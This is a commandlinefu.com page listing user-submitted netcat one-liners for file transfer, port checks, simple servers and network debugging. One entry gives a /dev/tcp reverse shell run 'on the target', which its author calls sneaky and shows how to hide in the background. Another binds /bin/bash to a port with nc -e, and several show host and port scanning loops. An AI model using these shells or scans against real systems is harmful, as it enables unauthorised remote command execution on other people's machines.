Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.
Hide

Tags

Hide

Functions

Commands tagged netcat from sorted by
Terminal - Commands tagged netcat - 27 results
while true; do cat "file"; done | nc -v -l 1337
2014-02-06 03:02:58
User: bknk
Functions: cat
0

A TCP server that keeps the same socket open, sending the contents of "file" repeatedly.

nc -kl 5432 -c 'echo -e "HTTP/1.1 200 OK\r\n$(date)\r\n\r\n";echo "<p>How are you today?</p>"'
2013-11-12 14:00:11
User: gvitalie
Functions: echo
-1

-k, --keep-open will keep connection alive, and we could exclude using 'while true'

nc is such a powerful command, it could be used instead of any OS! :p

echo -n 023135 | perl -pe 's/([0-9a-f]{2})/chr hex $1/gie' | nc -4u -q1 -p5001 192.168.0.100 2000
2013-09-18 14:31:47
User: sucotronic
Functions: echo perl
1

Use it to send raw data to a networked device. Used to interact with relay controller board whose documentation is lost, so use wireshark to sniff the sent data and replayed using the command.

wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd"
2013-05-31 00:04:19
User: bhbmaster
Functions: ssh
0

wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd"

Run above command from Windows Cygwin:

On Windows: Install Cygwin, and copy WMR (windows memory reader 1.0) memory diagnostic into cygwin\bin folder, also install cygwins netcat and ssh (openssh). I recommend installing apt-cyg and running "

On Linux: Have an SSH Server

SIMPLEST FORM:

WINDOWS: # wmr - | ssh root@savelocation.com "cat - > /tmp/FileToSave.dd"

For more details on how to extract information from memory dump:

apt-get install foremost

foremost -t all -T -i /forensics/T430-8gb-RAM1.dd

For more information:

http://www.kossboss.com/memdump-foremost

exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
2012-11-16 02:48:01
User: somaddict
Functions: cat exec read
7

This is sneaky.

First, start a listening service on your box.

nc -l 8080 -vvv &

On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor.

exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done

You can send it to the background like this:

(exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) &

Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.

nc -l $PORT | pv -b > archive.tar.bz2
2012-11-13 16:47:45
Tags: netcat tar pv
0

Receives bzip'd tar archive via netcat (openbsd nc) and stores locally. Displays size with pv. Start this receiver first, then the sender.

tar -cjf - $DIR | nc $HOST $PORT
2012-11-13 16:44:26
Functions: tar
Tags: netcat tar
0

Tar's up $DIR locally (w/bzip2) and sends remotely to $HOST:$PORT where netcat listens (using openbsd netcat). Start up receiving side command first, then execute this.

nc -zvw 1 host port
2012-07-13 20:02:17
User: akhilravidas
Functions: host
Tags: netcat
6

Try to perform a fully TCP 3 way handshake on for a given host-port with a timeout of 1s.

IFS=$'\n' && for f in `find . -type f -exec md5sum "{}" \;`; do echo $f | sed -r 's/^[^ ]+/Checking:/'; echo $f | cut -f1 -d' ' | netcat hash.cymru.com 43 ; done
2011-10-15 03:38:47
User: Neo23x0
Functions: cut echo md5sum sed
11

Command makes use of the Malware Hash Registry (http://www.team-cymru.org/Services/MHR/).

It parses the current directory and subdirectories and calculates the md5 hash of the files, then prints the name and sends the hash to the MHR for a lookup in their database.

The 3rd value in the result is the detection percentage across a mix of AV packages.

while true ; do nc -l 80 < index.html ; done
2011-08-31 15:17:33
User: ztank1013
Functions: true
12

Very simple web server listening on port 80 will serve index.html file or whatever file you like pointing your browser at http://your-IP-address/index.html for example.

If your web server is down for maintenance and you'd like to inform your visitors about it, quickly and easily, you just have to put into the index.html file the right HTML code and you are done! Of course you need to be root to run the command using port 80.

fuser -n tcp -s <port> && echo "+open"
lsof -i :22
nc <ip> <port> -v
nc -l -p 7777 > /dev/null
2011-01-24 00:06:45
User: kerim
1

On the another machine write this command.

pv -r /dev/zero | nc 192.168.1.1 7777

It will show live throughput between two machine.The destination machine ip is at our example 192.168.1.1

You must multiply by 8 for the network calculation.

You must install pv and netcat commands for this commands usage.

kerim@bayner.com

http://www.bayner.com/

echo -e "GET /ip HTTP/1.0\nUser-Agent: netcat\nHOST: ifconfig.me\n\n" | nc ifconfig.me 80 | sed -n '/^[0-9]/p'
2010-06-16 19:08:05
User: putnamhill
Functions: echo sed
-2

Here's a version that uses netcat (although I'd much rather use curl!).

grep current_state= /var/log/nagios/status.dat|sort|uniq -c|sed -e "s/[\t ]*\([0-9]*\).*current_state=\([0-9]*\)/\2:\1/"|tr "\n" " "
nmap -p 80 hostname
nc -zw2 www.example.com 80 && echo open
2009-12-07 21:35:25
User: sputnick
Functions: echo
Tags: netcat nc
6

@putnamhill, no need if statement in that case.

&& is a AND and || is a OR

if (nc -zw2 www.example.com 80); then echo open; fi
gate() { mkfifo /tmp/sock1 /tmp/sock2 &> /dev/null && nc -p $1 -l < /tmp/sock1 | tee /tmp/sock2 & PID=$! && nc $2 $3 < /tmp/sock2 | tee /tmp/sock1; kill -KILL $PID; rm -f /tmp/sock1 /tmp/sock2 ; }
2009-09-25 08:10:23
User: true
Functions: kill mkfifo rm tee
1

USAGE: gate listening_port host port

Creates listening socket and connects to remote device at host:port. It uses pipes for connection between two sockets. Traffic which goes through pipes is wrote to stdout. I use it for debug network scripts.

for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done
2009-09-25 03:31:29
User: rez0r
9

Simple one-liner for scanning a range of hosts, you can also scan a range of ports with Netcat by ex.: nc -v -n -z -w 1 192.168.0.1 21-443

Useful when Nmap is not available:)

Range declaration like X..X "for i in {21..29}" is only works with bash 3.0+

nc $telnetserver 23 < $commandfile
2009-08-07 21:32:38
User: flokra
1

sends commands specified in $commandfile to the telnet-server specified by $telnetserver.

to have newlines in $commandfile interpreted as ENTER, save the file in CR+LF (aka "Windows-Textfile") format.

if you want to save the output in a separate file, use:

nc $telnetserver 23 < $commandfile > $resultfile
function my_irc { tmp=`mktemp`; cat > $tmp; { echo -e "USER $username x x :$ircname\nNICK $nick\nJOIN $target"; while read line; do echo -e "PRIVMSG $target :$line"; done < $tmp; } | nc $server > /dev/null ; rm $tmp; }
2009-06-11 22:14:48
User: Josay
Functions: cat echo read rm
Tags: netcat irc nc
1
command | my_irc

Pipe whatever you want to this function, it will, if everything goes well, be redirected to a channel or a user on an IRC server.

Please note that :

- I am not responsible of flood excesses you might provoke.

- that function does not reply to PINGs from the server. That's the reason why I first write in a temporary file. Indeed, I don't want to wait for inputs while being connected to the server. However, according to the configuration of the server and the length of your file, you may timeout before finishing.

- Concerning the server, the variable content must be on the form "irc.server.org 6667" (or any other port). If you want to make some tests, you can also create a fake IRC server on "localhost 55555" by using

netcat -l -p 55555

- Concerning the target, you can choose a channel (beginning with a '#' like "#chan") or a user (like "user")

- The other variables have obvious names.

on the listening side: sudo nc -lp 2022 | sudo tar -xvf - and on the sending side: tar -cvzf - ./*| nc -w 3 name_of_listening_host 2022
2009-03-27 09:59:33
User: smcpherson
Functions: sudo tar
Tags: netcat
-2

This is useful for sending data between 2 computers that you have shell access to. Uses tar compression during transfer. Files are compressed & uncompressed automatically. Note the trailing dash on the listening side that makes netcat listen to stdin for data.

on the listening side:

sudo nc -lp 2022 | sudo tar -xvf -

explanation: open netcat to -l listen on -p port 2022, take the data stream and pipe to tar -x extract, -v verbose, -f using file filename - means "stdin"

on the sending side:

tar -cvzf - ./*| nc -w 3 name_of_listening_host 2022

explanation: compress all files in current dir using tar -c create, -v verbose, -f using file, - filename - here means "stdout" because we're tar -c instead of tar -x, -w3 wait 3 seconds on stream termination and then end the connection to the listening host name_of_listening_host, on port 2022

nc -l -p 2000 -e /bin/bash
2009-03-02 15:58:25
User: prayer
Tags: Network netcat
6

To connect to the shell run:

nc server.example.org 2000